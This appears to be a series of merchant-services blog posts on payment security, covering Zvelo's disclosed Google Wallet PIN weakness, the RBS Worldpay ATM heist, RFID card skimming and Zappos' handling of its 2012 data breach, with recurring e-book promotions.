Inside the Black Hole

As regular readers of this blog know very well, we love the concept behind Google Wallet here at UniBul Merchant Services. We believe that every digital wallet, just like its physical counterpart, should allow its users to store in it all types of payment methods they may want, including bank cards issued by different banks and bearing different brand logos. And Google is offering precisely that.

However, data security is even more important than convenience and user-friendliness. In fact, your service should not be made available to consumers until your system can be guaranteed to protect your customers’ personal information. And that apparently is not the case with Google Wallet.

How to Crack Google Wallet in Seconds

The good people at Zvelo have done a lot of work evaluating Google Wallet’s security credentials and have found them wanting. They have built an app that can enable anyone to retrieve your Google Wallet PIN, if they can get their hands on your phone. They have even posted this video to show you how quickly and painlessly this is done:

Now, this Zvelo app may not be made available for download on the Android Market anytime soon, but the bad news is that it is apparently incredibly simple for anyone with a relatively modest amount of technical skills to replicate it. There is a lot of technical jargon in Zvelo’s explanation of the hack, but here is the gist of it:

The lynch-pin, however, was that within the PIN information section was a long integer “salt” and a SHA256 hex encoded string “hash”. Knowing that the PIN can only be a 4-digit numeric value, it dawned on us that a brute-force attack would only require calculating, at most, 10,000 SHA256 hashes. This is trivial even on a platform as limited as a smartphone. Proving this hypothesis took little time.

Google Wallet allows only five invalid PIN entry attempts before locking the user out. With this attack, the PIN can be revealed without even a single invalid attempt. This completely negates all of the security of this mobile phone payment system.

There it is, hacking Google Wallet is “trivial.”

Who Should Be Responsible for Keeping Your PIN Secure?

The Zvelo guys tell us that they immediately contacted Google, alerting them of the vulnerability they uncovered and the search giant “was extremely responsive to the issue, but ran into several obstacles preventing them from releasing the fixed app.” Then we are walked through the obstacle course, which I will spare you, but the interesting part comes at the end of it.

It turns out that when the Google engineers did find a fix for the vulnerability, they promptly ran into another issue, one for which there was no technical solution. “[W]ith the proper fix in place, the PIN will be nearly impossible to crack,” the Zvelo guys assure us, however, the securing of the user’s PIN may “constitute a “change of agency” responsible for keeping the PIN secure.” So not Google, but the card issuer would be the responsible party.

We don’t yet know whether the banks would agree to this “change of agency” thing, but my guess is that they would accept it. There is no doubt in my mind that eventually the NFC technology that is behind Google Wallet will be every bit as secure as any other payment technology, so the banks’ liability will decrease greatly over time. Moreover, being the party responsible for the security of the users’ data will put the issuers in a much better bargaining position when negotiating the terms of their partnership with Google.

The Takeaway

Google Wallet has been in the news, and on the pages of this blog, for so long now that you may be forgiven for thinking that you may be the only one not using it. Well, you may take comfort in the knowledge that the exact opposite is actually true: there are very few Google Wallet users at present. Moreover, there are only two phones on the market today which support it: Google’s own Nexus S and Galaxy Nexus.

So, if there was ever a good time to be uncovering security shortcomings in the service, it would surely be now. Yet, I don’t think it is too much to expect that hacking the current wallet version would not be a “trivial” exercise. I almost get the sense that Google doesn’t care about understand the importance of protecting its customers’ personal information. I can only hope to be proved wrong.

Image credit: Google.

We have been greatly impressed by the way Zappos has managed its data breach so far. The retailer did a great job of communicating what happened to the public and of providing clear instructions to its customers on what they needed to do to help get things back to normal. And by all appearances, things did get back to normal five days after the breach was announced.

But it could have been worse, much worse. See, Zappos seems to have been fortunate (or was it well prepared?) that the hackers did not get access to the retailer’s database that stores its customers’ credit card and other payment-related information. In the event, a mere change of the customer passwords was sufficient to cure the problem. If the credit card data were hacked, however, the remedial process would have had to be much more complicated and Zappos’ potential liability – much greater. Let me illustrate what I mean with an example.

How the RBS Worldpay Hackers Stole $9.5 Million in 2008

In November 2008 we saw how quickly a large, well organized criminal network can inflict huge damage using stolen credit card data. Back then a group of criminals hacked their way into the files of RBS Worldpay, the U.S. payment processing subsidiary of the Royal Bank of Scotland. Unlike what took place during the Zappos event, the RBS hackers managed to gain access of the credit and debit card data of 1.5 million cardholders. And they made the best use of it in the short amount of time they knew they had, before the cards were closed.

So once the hackers got their hands on the cardholder information, they immediately distributed the loot to a large network of co-conspirators who encoded the stolen data into counterfeit payment cards. But the hackers’ job was far from finished. While their pals were producing fake cards, the hackers got busy modifying RBS Worldpay’s computer systems, so that they could increase the available funds on the cards (in some cases to as much as $500,000), as well as the limits on the amount that could be withdrawn at ATMs.

Only at this point were the criminals ready to cash in. The counterfeit cards were put to use and, over the course of less than twelve hours, the criminals managed to withdraw $9.5 million from some 2,100 ATMs in 280 cities. While the heist was under way, the hackers, still “logged into” RBS Worldpay’s system, were monitoring the withdrawals in real time and, once the job was done, tried to erase their tracks. The criminals were eventually caught, but the damage they’d done was huge.

U.S. Suffers 30 Data Breaches per Month

Now, the above example is truly extraordinary in its complexity and scale and such well-planned and executed electronic heists are fortunately a rare occurrence. But smaller-scale data breaches happen all the time and at the end of Q1 2010 they were occurring at an average rate of around 30 per month in the U.S. alone. Here is how the occurrences of publicly disclosed data breaches were distributed across the last five years of the previous decade (source):

And it turns out that close to a third of all data breaches are caused by insider actions, either malicious or, much more commonly, accidental (source):

As you see, the vast majority of all data breaches are the result of low-tech actions or plain negligence. That doesn’t make them any less damaging, though, which is why the PCI DSS requirements are becoming ever stricter (much to merchants’ annoyance, unfortunately).

The Takeaway

We don’t yet know the full extent of the damage inflicted by the Zappos hackers and it will probably be quite some time before we do, if we do. Yet, what is known even now is that the criminals were unable to access the most valuable part of the retailer customers’ profiles: their payment account information. We can only hope that it wasn’t dumb luck that protected that most sensitive of customer data and I also hope that we will eventually learn if it was.

Image credit: TwentyFifthYear.com.

Learn how to lower your card acceptance cost

Learn how to accept credit and debit cards at the lowest processing costs. The Payment Card Acceptance kit contains a video and an e-book:

• Video – Card Acceptance Best Practices for Lowest Processing Costs (18 min).
• E-Book – Payment Card Acceptance Guide (19 pages).

Forbes’ Andy Greenberg has a very nice piece on the vulnerability of contactless bank cards to a new form of skimming, which has traditionally been defined as the illegal copying of the information stored in a payment card’s magnetic stripe. The radio-frequency identification (RFID) technology has made it possible for this information to be wirelessly transmitted between a chip embedded into a card, which contains the account data, and an RFID-equipped card reader. Such readers are becoming “increasingly present” at retailer checkouts, where they allow cardholders to complete a payment by waving their card by, rather than swiping it through, the point-of-sale (POS) terminal.

The problem is, as Greenberg reminds us, that RFID card readers can easily and cheaply find their way into the hands of criminals who can then use them to copy your credit card information, even as the card never leaves your wallet, which is “securely” tucked into the inner pocket of your coat. So what can we do to protect ourselves against such high-tech pickpocketing? Well, it turns out that we have a range of options, including frying the card to kill the chip, but banks seem to have taken even more drastic measures.

How Wireless Credit Card Skimming Work

In his piece Greenberg tells us about a presentation given by Kristin Paget, a data security expert, at a hacker conference, which has provided everyone in attendance with a step-by-step guide to the wireless stealing of credit card data. It is a disturbingly straightforward process, which relies on the use of equipment that can be legitimately purchased for a few hundred dollars on eBay.

In fact, I found a couple of YouTube videos that show you exactly how this is done. It’s really incredible to see how easy it is. Watch this one, for example:

And this one:

The problem is that there doesn’t seem to be a way to make our cards readable only by authorized devices. So what’s there to be done?

How to Protect Ourselves against Wireless Skimming

As I mentioned above, one of the options suggested by Greenberg’s security expert as a sure way to neutralize the wireless skimming threat is to fry the vulnerable chip. There is catch, though. While “[t]hree seconds in the microwave will kill the chip…, [f]ive seconds will set it on fire.”

Recognizing the need for a somewhat less arsonous way of dealing with the issue, Paget has come up with a protective device that would be inserted in your wallet to block the RFID waves. Think of it as the wallet-sized equivalent of the heavy blanket placed on your upper body when your dentist takes an X-ray picture of your teeth.

Yet, whatever the effectiveness of such RFID blocking devices and strategies, there is a much bigger issue at play here. It has to do with the fact that most cardholders have no idea that their cards are readable from a distance. And if you don’t know that, you also don’t know that you have a problem. So is there anything that can be done?

The Takeaway

The bottom line is that contactless skimming is a problem and one that makeshift protective devices alone, or microwave ovens for that matter, cannot solve. Ideally, RFID data transmission would only be possible when the cardholder authorizes it, but that does not seem to be feasible at present. Or at least no one is talking about it.

What I’ve noticed is that at least one big card issuer has resorted to a much more drastic solution to the problem: getting rid of the wireless capability altogether. My two new Chase cards do not display the “Blink” logo, which designates RFID capability, whereas the ones they replaced did feature it. If Chase has done it, I have no doubt that others have too. And I think that this is the right response. If you can’t fully secure a given technology, you shouldn’t be using it.

Image credit: MZB.ru.

Learn how to lower your card acceptance cost

Learn how to accept credit and debit cards at the lowest processing costs. The Payment Card Acceptance kit contains a video and an e-book:

• Video – Card Acceptance Best Practices for Lowest Processing Costs (18 min).
• E-Book – Payment Card Acceptance Guide (19 pages).

We received an incredible amount of feedback to our post last week on the Zappos data breach. The interesting thing about it was that while most of the readers came from our Facebook page, where all of our new articles are immediately posted, and a decent number of them hit the “Like” button, the vast majority of the responses came from Twitter. As a side note, that is beginning to become a trend now and we’d be interested in hearing what experience you’ve had with reader engagement to blog posts published on your business’ Facebook page and a Twitter account.

But let’s move on to the issue at hand. It’s been ten days now since Tony Hsieh, CEO of Zappos.com, the Amazon-owned online shoe and apparel retailer, announced in an email that his company had suffered a data breach. We were so impressed by Zappos’ response that we analyzed in detail Hsieh’s email in our initial post and suggested that everyone who may ever have to deal with a similar crisis should use it as a template. But how has the company done since then and more importantly, how have Zappos’ customers been affected in the event’s aftermath?

Well, the retailer has again done an outstanding job and deserves the highest marks for its efforts and, as best we can tell, its customers have suffered no lasting damage at all.

What Has Zappos Done since It Announced the Data Breach?

Following the initial email announcing the breach, Zappos has published two updates on the web page that was specially created for the purpose of keeping customers, and the outside world at large, informed on the progress the retailer was making in getting things back to normal. These updates were terse and to the point.

The first one explained the meaning of a technical term – “cryptographically scrambled” – and informed readers that the company was cooperating with the FBI in its investigation, which is following the standard procedure for dealing with the aftermath of a data breach.

The second update announced that Zappos’ phone system was again functioning as normal, after being intentionally turned off following the event, because it would not have been able to handle the expected volume of incoming calls (which was explained in Hsieh’s email).

So, while the investigation is still ongoing, things are now back to normal at Zappos. But what were the consequences for its customers?

What Is the Damage to Zappos’ Customers?

I read somewhere that the attorneys for a Zappos customer are seeking a class-action suit against the retailer, which was more or less to be expected. But how justified are consumers’ worries in this case? Well, to answer that question we’ll need to understand exactly what information has been compromised.

Zappos told its customers that:

[T]here may have been illegal and unauthorized access to some of your customer account information on Zappos.com, including one or more of the following: your name, e-mail address, billing and shipping addresses, phone number, the last four digits of your credit card number (the standard information you find on receipts), and/or your cryptographically scrambled password (but not your actual password).

We were also told that:

THE DATABASE THAT STORES OUR CUSTOMERS’ CRITICAL CREDIT CARD AND OTHER PAYMENT DATA WAS NOT AFFECTED OR ACCESSED.

So the hackers seem to have gained access to some of the information stored in Zappos’ customer profiles. It is unclear whether or not the criminals may have been able to actually access the customers’ accounts, because we don’t know if they could have retrieved the associated passwords. But even if they could have done that, that wouldn’t have been all that big of a gain. They could have attempted to place an order, which, even in the unlikely event that it went through, would’ve been immediately disputed and the cardholder would have been reimbursed for any financial losses. Moreover, any bank card information that may have been stored in a compromised profile would have been unusable, because it only displays the last four digits of the account number.

At the end, given that the data breach was immediately discovered and the passwords reset, the criminals would have been left with information that for the most part is usually freely available on Yellow Pages.

The Takeaway

The significance of the Zappos data breach should not be minimized and I’m not attempting to do so. Such events are potentially hugely damaging both for the affected business and its customers, so every effort should be made to prevent them from occurring. If a business is found to have not complied with existing data security standards or to have otherwise been lax in safeguarding sensitive customer information, it should be held accountable for its carelessness. We don’t yet know whether Zappos is guilty on any of these counts, so, though I reserve the right to comment on that issue when information becomes available, I can’t do so at present.

However, the fact remains that Zappos’ response to the crisis has been exceptional and the company deserves to be commended for it. But the real good news is that Zappos’ customers have suffered no lasting damage.

Image credit: REUTERS/Zappos.com/Handout.

Learn how to lower your card acceptance cost

Learn how to accept credit and debit cards at the lowest processing costs. The Payment Card Acceptance kit contains a video and an e-book:

• Video – Card Acceptance Best Practices for Lowest Processing Costs (18 min).
• E-Book – Payment Card Acceptance Guide (19 pages).

We’ve written about the mechanics of dealing with data breaches on this blog several times before, but Zappos, the Amazon-owned online shoe and apparel retailer, is giving us a great real-time lesson on the subject that everyone who may ever have to deal with the issue should look to for guidance. There is a lot to be learned.

Zappos has built its reputation around, and owes its huge success to, providing an exceptionally high level of customer service, including a 365-day no-questions-asked return policy. Zappos customers, this blogger very much included, really feel that their satisfaction is the retailer’s top priority and there is nothing to test the validity of this belief as a confirmed breach of sensitive customer account data. But as I said, Zappos is meeting the challenge with flying colors.

Crisis Management Lessons from the Zappos Data Breach

Zappos announced the data breach in an email from founder and CEO Tony Hsieh to all of the company’s employees that was also published on the retailer’s blog for the whole world to see. This email deserves close examination, as it should be used as a crisis management template by everyone who finds his company in a similar predicament. Let’s do it.

Lesson 1: get everyone involved. By addressing all of his employees, Hsieh makes it clear to both his own organization’s staff, as well as to the outside world, that this is an issue that is the responsibility of everyone within his company to help dealing with.

Hsieh begins his email thus:

Please set aside 20 minutes to carefully read this entire email.

Lesson 2: make the gravity of the situation immediately clear. It is a short email that takes a few minutes of careful reading to get through, but Hsieh is asking that employees spend much more time on it. Why? Because the issue is critical and he wants everyone to understand that and give it some thought.

Then the CEO tells us what took place:

We were recently the victim of a cyber attack by a criminal who gained access to parts of our internal network and systems through one of our servers in Kentucky. We are cooperating with law enforcement to undergo an exhaustive investigation.

Lesson 3: get straight to the point and tell it like it is. Once you’ve got everyone’s attention and made it clear how important the issue at hand is, the only sensible way to proceed is to describe the matter clearly and concisely. Hsieh does just that.

Now Hsieh tells us that he is not allowed to provide specific details, but adds this:

…THE DATABASE THAT STORES OUR CUSTOMERS’ CRITICAL CREDIT CARD AND OTHER PAYMENT DATA WAS NOT AFFECTED OR ACCESSED.

Lesson 4: don’t overblow the positive aspects (if any). The problem is huge and you’ve already made that point clear. Now, if there is anything that is positive about the story, tell the facts, but don’t make it sound as if it is equally, never mind more, important than the bad news. Doing so would weaken the message of urgency you are sending. That’s also why in his letter to Zappos’ customers that follows the one to his employees, Hsieh refers to this aspect of the story as “the better news,” not a good or positive one.

Hsieh finishes his email in this way:

The most important focus for us right now is the safety and security of our customers’ information. Within the next hour, we will begin the process of notifying the 24+ million customer accounts in our database about the incident and help step them through the process of choosing a new password for their accounts. (We’ve already reset and expired their existing passwords.)

Lesson 5: reiterate your commitment to solving your customers’ problem and say what you are doing about it. You need to look at the issue through the eyes of your customers. They don’t care what your company is going through or how much the cleaning up process will cost you. The only things your customers care about is how big the damage is and what you are doing to protect their interests. That’s what you should be telling them and that is precisely what Hsieh has done.

Then Hsieh attaches the email that his company will be sending to its customers, which informs them of the data breach and tells them what the company has already done to remedy the issue. The letter also asks that customers do the following:

PLEASE CREATE A NEW PASSWORD:

We have expired and reset your password so you can create a new password.

Lesson 6: tell your customers what they need to do. As your customers’ accounts are now compromised, new log-in credentials need to be created. Make this process as simple and straightforward as you can and clearly tell your customers what they need to do. Again, Zappos has done just that.

The letter provides a link to a page where Zappos customers can go to for updates and also informs them that:

We have made the hard decision to temporarily turn off our phones and direct customers to contact us by email because our phone systems simply aren’t capable of handling so much volume. (If 5% of our customers call, that would be over 1 million phone calls, most of which would not even make it into our phone system in the first place.)

Lesson 7: if your customers will be inconvenienced in some way, inform them beforehand and explain why. The worst thing you could do, if things started working differently from the way they used to, would be to keep customers in the dark as to the reason. That would be a sure way to provoke a torrent of negative publicity in the form of angry tweets and comments on the news stories covering the event. So if your customers will be seeing changes in the way you communicate with them, tell them what they should be expecting and why (and make sure there is a good reason for it!).

The Takeaway

Bad things do happen and data breaches are certainly no exception. Your customers understand that and will give you the benefit of the doubt, if you do suffer a breach, unless you’ve been egregiously negligent in protecting their information. Your response to the crisis will be the only thing that determines whether the issue is resolved with minimal damage and inconvenience to your customers or it deteriorates into a PR disaster.

Zappos is giving us a lesson on how to do this properly and we should all be taking notes.

Image credit: Resimbul.com.

Learn how to lower your card acceptance cost

Learn how to accept credit and debit cards at the lowest processing costs. The Payment Card Acceptance kit contains a video and an e-book:

• Video – Card Acceptance Best Practices for Lowest Processing Costs (18 min).
• E-Book – Payment Card Acceptance Guide (19 pages).